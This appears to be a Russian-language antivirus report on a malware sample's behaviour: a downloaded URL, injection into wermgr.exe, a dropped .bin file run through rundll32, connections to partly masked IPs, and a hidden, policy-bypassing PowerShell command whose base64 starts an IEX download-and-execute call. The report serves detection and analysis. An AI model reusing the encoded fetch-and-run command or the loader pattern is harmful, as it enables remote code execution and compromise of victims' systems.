Техническая информация
Вредоносные функции
Загружает
- http://10#.#48.201.26/lovemetertok.php
Внедряет код в
следующие системные процессы:
- <SYSTEM32>\wermgr.exe
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\syswow64\cmd.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\dwtng.bin
Сетевая активность
Подключается к
- '10#.#48.201.26':80
- '14#.#1.195.33':80
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAw...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAw...
- '<SYSTEM32>\rundll32.exe' %TEMP%\dWtnG.bin StartW
- '<SYSTEM32>\wermgr.exe'
